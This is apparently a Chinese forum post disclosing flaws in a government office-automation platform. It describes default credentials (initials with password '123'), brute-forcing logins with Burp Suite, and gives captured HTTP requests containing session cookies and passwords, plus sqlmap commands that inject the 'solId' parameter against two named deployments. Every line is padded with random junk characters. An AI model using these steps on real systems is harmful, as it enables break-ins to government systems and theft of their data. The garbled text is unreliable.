|
* Y; E* k# P; [. B: X: l
- u7 C0 U$ }/ g5 |) d 9 C5 H |; g, V" F
I' O2 ^( ^3 t7 X5 U3 N
平台简介:$ N7 v5 z. ?) v2 a$ e
0 F; h }- c6 Y; r, ]; H0 ^& I( S, o* j& [
% I' w7 R( l9 m. [: V* S! ?
" [& @/ S' ^( X2 A: b
! H! A0 q6 ]. p8 L. k- T. T 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。 " ~7 D% J, _0 Y! D
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
' C1 {3 R. J% P3 X同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
' r) b- m; x; I7 X1 o% Y
/ z8 Z( `1 n8 z- E- O1 o! T, g- Q& t( f6 E8 ]& i4 D
8 C0 E; O, z2 g' z& s: _
9 D8 e) Z# S7 W! _, U. k$ `
: |$ D0 D. j6 a" h$ Y 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:9 O8 z9 i& n0 m( L* r
; I. s. {3 p6 B/ X1 \2 K' e" w3 H* A; Y0 X0 {- M
7 Y. O8 c# t3 h, D 6 B5 D0 w7 ~& }& B2 _9 z
$ `5 T/ b$ I- A0 }9 z) C http://1.1.1.1:7197/cap-aco/#(案例2-)
1 i( A4 |) z2 b0 b( _: F
3 A8 i, r/ ^- u! H: u
+ q |6 D0 a6 F% s) y: v http://www.XXOO.com (案例1-官网网站)% v& C3 ^; Q7 ~( ^" t' J1 H+ r
9 x& o5 X) P9 r/ t! M! E/ d+ r8 s: u
2 z; k# x' j4 l1 ], C; }( J
7 O2 @- U7 I" T- ^& K + C4 ~7 C* ~* g0 p7 K1 w) x) A
# l# @4 k' i6 ^" A, u/ N0 t
漏洞详情:+ {$ }6 C4 ~/ O1 X" g9 a% y6 W
4 O9 y% w5 L/ s6 T! K5 r0 }: W! k
9 |+ k# g1 U4 m7 G% K. Q1 X 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试) ?( C7 ~3 u! a$ x$ @# j/ a
' W0 K# V6 f" A
9 ]/ ?+ W+ g. c# K: M! a0 j
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
& D7 z6 S# g: `# W) G% F; e 3 r% I5 t+ z+ t" l; j9 s
, k' d2 K9 O3 S4 p/ h( Y- V0 F" ]
! {. K$ S) B* b5 ^, m
( d5 _' c0 v% P
6 I8 r4 X$ F0 T' X$ \* }
7 Q; R6 O* Y6 b, F0 n; { q + \2 ?) A1 H0 M5 e
* p& z% O8 T! N! L. A4 I% C status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
, T& d2 ?5 A% O; t, r- |& P8 `
% f, H* _$ m1 C0 G7 o4 k/ m
" ~3 }' {2 F% |) |2 @ 1、案例1-官方网站
' l a: F/ b: M2 K- q+ Q8 n! B" e) L 1 F# I4 u# ^8 ]- Z% B" r; ^
5 {( L) l. P3 K GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.19 Z M9 Z- f% I0 n
' {8 O1 X; x5 s! y+ U; t- [* Z
: f, r% c3 R# a4 k/ E7 O. Z Host: www.XXOO.com( e, I5 P9 H" P4 O- ?; j) ~: _
! z% o5 G# p8 f
+ h w$ X1 i$ D9 b4 W* U! c Proxy-Connection: Keep-Alive# m# M! R. p; i. U! I1 X6 G
0 s# q5 | E( B5 S! I" u
4 p; c# Q* T+ I4 t3 l! Y- j
Accept: application/json, text/javascript, */*; q=0.019 k4 N3 J; u" J
1 f' u( f3 @! b" s
% d( x8 r9 a8 K( O( [0 _ Accept-Language: zh-CN1 u/ s, x' [, z- K4 {
4 s q% K9 W" M6 d6 Y& z1 O% w
' q2 H# n. C; I2 t8 e* D Content-Type: application/json, n7 F- v* ~2 r! y1 q
3 ^) `' {) d! ~5 M g3 S
2 _5 Y# \5 c; v- t User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko2 q* T& [) {$ \" t) R# q. {
2 o8 C* v' e3 T' I1 T7 Y& w( t [4 h4 p! t, ]* ?/ a9 v0 i
X-Requested-With: XMLHttpRequest# @0 B6 L" |) Q
8 d8 P0 R9 Z2 G2 a
6 y* O# ]( ]: T) ]; {5 Y$ i5 n
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
; Y. ^% \# y$ t( J8 m( N
0 h K, `' A' p( f/ m0 `7 P1 m
% v, H% l% Z: Q Accept-Encoding: gzip, deflate, sdch V5 P1 y7 ]4 l
7 P0 m) [0 ^% b( X& U2 d2 T' i
3 _' K9 `! b$ m3 h% y3 r. I1 [" Z. ] Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
& {" n( L: m2 l0 S7 _4 _+ x7 N
/ A" h+ z* i/ V) [! i4 O# Y2 M4 s! E) J$ z* ~. ?) M
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:% E2 I* N; N8 u! `
5 O6 A" D8 u( Q n- A
1 O# ]. y& W7 C9 x ?: n$ B2 N ( C* E9 N* ^$ N
N7 W4 s6 g; F* E2 U) F
s b! Q" c; O: m" M( e
1 k) |: c: {* O, T( j
3 E6 A! M! R$ P, U8 a D
" d( }9 z( @$ @
: j9 U" A: W; z7 w' p/ I2 e
3 q2 v! ^6 ]- K4 h3 F w( v" h' {1 l" m7 m
" F( s$ C" a# f! i
7 b( k; ]4 j, S5 c! r! }( w
7 A8 i0 z% w7 }4 B5 g/ _+ r
6 N o8 \6 f9 K: ?' }1 p1 w 5 o- Z! i0 X& o' L4 P& v
2 M1 f: Z8 _9 u
2、案例2-某天河云平台
$ R( y& |- O9 Z, {7 P# }/ s
8 X* U, S' [9 {6 _" p1 M7 }1 X
4 ^9 P8 _* T& |. d, ^. c GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
# k0 r8 \$ M/ o+ ^+ |# A% L8 M
( F- [' e6 i2 m$ A H
5 f# N3 u* A' s2 u6 s Host: 1.1.1.:7197
$ `( M/ L' N+ i" c ; @% z4 o* l1 n) W; R4 J9 |
! U) S' Y* H# z( r7 N- ~( m
Accept: application/json, text/javascript, */*; q=0.01
. g% K2 h- [6 E# i/ M4 a$ U8 u ) {9 Z% P6 v4 E0 G& b
, x- u/ P d# @ X-Requested-With: XMLHttpRequest
) G8 N9 o2 H5 S) W' S8 a
; N- O6 f/ k, M# E( ?8 l% y
3 y/ H' M1 k8 i3 G" N4 w z User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0: ]& W! `) o7 _) n1 l
4 n0 O- t( Z. G4 ~% M' `) A9 ?! _# J+ N$ H% ^
Content-Type: application/json( g. [6 z3 ]) A0 v
; y1 n) G' g, z! I6 B+ Y0 M1 i' C/ T, |- P% `% D
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008: ?! {. I* P1 Y+ l+ }+ s
, j. ]2 H) B, F+ S9 B4 O5 m7 Q; S) p( ~- R% c; m/ h: j6 a8 _5 O
Accept-Language: zh-CN,zh;q=0.88 A8 T' ~5 h2 @+ u& s8 M
' C" i9 A9 M+ [& r( V2 h! |
: m4 i2 }; r8 e( h, d Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
% R+ G% ^2 {4 E5 L
5 u; G4 H3 ^8 F1 ~1 y/ J5 k# f1 b3 W/ ?
Connection: close
$ C/ @ W# k$ z% c7 h 8 _/ s4 l& Q& z( v: p0 {6 F4 `1 g
( C: D. Z. Q0 C' P
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:" |) g# S$ {& C/ C* }( s
s8 z9 Y, y4 g8 |6 b3 n9 O) M2 I3 U2 f1 l: q S$ `7 G7 C& Z
4 W& M; D1 S7 Q% [: Y# H0 Q
8 C6 D9 ~# p1 O @
6 f S! L' d* Q G2 } ]! O% i( n5 o c# l9 w0 V5 [' [! R, n
|